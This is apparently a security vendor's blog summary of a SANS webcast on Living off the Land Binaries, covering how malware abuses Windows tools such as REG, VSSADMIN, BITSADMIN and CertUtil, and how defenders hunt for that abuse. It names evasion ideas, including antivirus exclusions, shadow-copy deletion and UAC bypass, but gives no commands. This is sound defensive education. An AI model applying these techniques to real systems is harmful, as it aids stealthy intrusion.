Living off the Land Binaries – aka LOLBins – represent one of the more creative and insidious malware threats today. Attackers use LOLBins to evade detection by manipulating legitimate systems and processes for malicious purposes. In this post—condensed from a SANS webcast featuring SANS Analyst Jake Williams and VMRay Sr. Research Analyst Tamas Boczan explain why malware authors use LOLBins, how they succeed in evading detection, and detail the many ways binaries are being abused.
LOLBins 101
Jake kicked off the webinar with a brief explanation of what LOLBins are, why attackers are using them, and which ones are being most commonly employed by attackers. While these tools have been around for some time, he explained that they have become especially relevant of late saying, “what we’re seeing now is a big push to incorporate LOLBins in the malware itself.”
By way of analogy, Jake compared LOLBins to the hunt for chemical weapons in the Iraq War, making the case that technologies that can be used to manufacture legitimate chemicals can also be used to construct weapons-grade materials — in essence, both function as ‘dual-use technologies’. In a similar fashion, the same tools we rely on to administer Windows systems can also be used for malicious purposes.
As to the question of why attackers are using LOLBins in greater numbers, Jake pointed out their primary motive: to avoid and misdirect detection tools. Since Endpoint Detection & Response and Endpoint Protection Platforms will dynamically modify their heuristic thresholds based on any number of defined parameters, attackers using LOLBins make detection via heuristics that much harder by splitting their functionality apart into multiple different pieces.
“This is why malware reversing and malware analysis is so important in our whole defensive ecosystem – it’s more than just figuring out what the malware do, it’s also about informing our defensive strategies,” said Jake.
Tamas offered more detail on how stealthy these attacks can be: “by editing the registry, not only can attackers add persistence but they can also add an exclusion to an antivirus like Windows Defender which is probably more effective than turning off the antivirus entirely as it allows the attacker to control the machine with less noise
Popular Executable Targets of LOLBins
All LOLBins essentially function the same way: by targeting and manipulating basic administrative binaries that allow an attacker to stealthy modify or disable services and settings, establish persistence, and change security configurations.
In this section, Jake provided an overview of four common executables that are most often co-opted by LOLBins. These include:
- REG.EXE: The registry editor is a foundational component of Windows and as such it has been a long-time target for malware authors as it allows them to add persistence to the registry, disable or install new services, and modify firewall settings.
- VSSADMIN.EXE: A default Windows binary that controls volume shadow copies of the documents on a given PC. It is a common technique for ransomware to use VSSADMIN.EXE to delete existing volume shadow copies of a user’s data.
- BITSADMIN.EXE: A Microsoft signed executable responsible for managing a service that transfers files in the background, that can also can be misused by attackers as a vehicle to download files, achieve persistence or execute code after a file has been transferred.
- NETSH.EXE: The NetShell executable is another very common process that attackers can use to change firewall and network configurations. Similar to VSSADMIN.EXE, NetShell is a process that is typically not called very often by legitimate use of the system.
Tamas offered more detail on how stealthy these attacks can be: “by editing the registry, not only can attackers add persistence but they can also add an exclusion to an antivirus like Windows Defender which is probably more effective than turning off the antivirus entirely as it allows the attacker to control the machine with less noise.”
Hunting Attackers Using LOLBins in Malware
LOLBins present a particular challenge when it comes to proactively hunting attackers, as by their very nature, it’s difficult to classify the exception of a single LOLBin as malicious. Instead, he advises that it’s necessary to take a close look at the context of how these files are executed, which most likely will reveal malicious LOLBin use.
Jake explained further, “If REG.EXE was called with an ancestor process of Explorer or if the execution chain of bitsadmin was invoked, followed by a random EXE name, then VSSADMIN — well that sounds to me like a dropper got put on a machine that then called BITSADMIN to download a file… and then we later saw a random executable name that called VSSADMIN — well then that sounds like that file is ransomware. So I’m following these patterns here to quickly come in and respond, hopefully before there’s catastrophic damage.”
Jake closed by making the case that this is yet another reason for analyzing malware: “through analysis we learn from how this malware was executed and infer how malware in the future is also going to behave so we can create better EDR and better hunting methodologies.”
In the second half of the webinar, Tamas Boczan, VMRay’s Sr. Threat Researcher took a closer technical look at why threat actors are using LOLBins and how they are using them in the wild.
Why Malware Authors are Living Off the Land
Tamas summarizes the three primary reasons why malware authors are leveraging LOLBins:
- Easier Development: Convenient command-line tools offer both specialized tools like Reg or Netshell as well as general high-level interfaces such as Powershell that are easier for malware authors to use than Windows API.
- Bypassing Application Whitelisting: This security mechanism enables the definition of rules for process creation. Similar to how we define rules for firewalls, admins can to allow or deny the execution of a process under certain conditions, such as the signer of the binary, its path or command line. Correctly configuring application whitelisting is challenging. If the rules are too restrictive, employees of the organizations will run into problems during normal use. If the configuration is too permissive, attackers can use living off the land techniques to bypass the security restrictions.
- Bypassing User Account Control: Since Windows Vista, applications are launched with restricted (low or medium) integrity levels, even if the user has administrator privileges. The application can signal to the system that it needs to run at a higher integrity level, at which point the access control enforcement dialog box pops up. To keep the number of alerts low, the default security settings since Windows 7 suppress this dialog box under certain conditions and escalate the privileges of the application silently. These conditions can be triggered by certain LOLbins, allowing attackers to escalate privileges without giving the user a chance to interrupt the execution.
Tamas pointed out, “for the same reason programmers use it, malware developers also use it – the main difference is that programmers have to adhere to some quality standards but malware, of course, has no QA department so they can and will cut corners.”
Other Misused Binaries
Tamas went on to look at a variety of binary types and detail how they are abused by LOLBins. Besides Reg, VssAdmin, NetSh and Bitsadmin discussed earlier, the dual-use binaries misused the most by malware also include:
- CertUtil
- CMSTP
- SchTasks
- InstallUtil
- WMIC
- Powershell
- Cscript
- cmd
- Microsoft Office binaries
Each one of these maintains a legitimate purpose and likewise, has the potential to be misused by malware. Tamas walks through the intended use case and how it can be abused.
For instance, the CertUtil binary is a program for managing the certificates on the system. A typical use case for a company would be importing the company’s signing certificate during install or for listing or verifying certificates.
CertUtil can be misused because it is also able to verify certificates that are online and downloads the certificate. “Of course before the download the tool cannot know that the file on the remote system may not be a legitimate certificate but it has to download this remote file in order to work with it,” said Tamas
PowerShell & Other Script Interpreters
The last set of binaries that Tamas reviewed are script interpreters such as:
- cmd which executes batch files
- Powershell which executes Powershell scripts
- Cscript which can execute VBScript and JavaScript
- MS Office which becomes a script interpreter if macros are enabled
Tamas noted, “these are powerful automation tools that are widely used so they might be necessary to whitelist. In malware, they are usually used as downloaders or droppers. Even though they are very powerful, attackers in the malware world usually prefer to implement code in C or .NET or another programming language, and not a scripting language. The script is used as a step to getting that code to execute. Another reason malware authors like to use it besides it being built-in and easy to use is that these scripts are very easy to obfuscate without needing to compile anything. So statically detecting malware in these scripts is very difficult.”
To learn more about LOLBins, watch the full webcast: A Wolf in Sheep’s Clothing: Dissecting Living Off the Land Binaries.
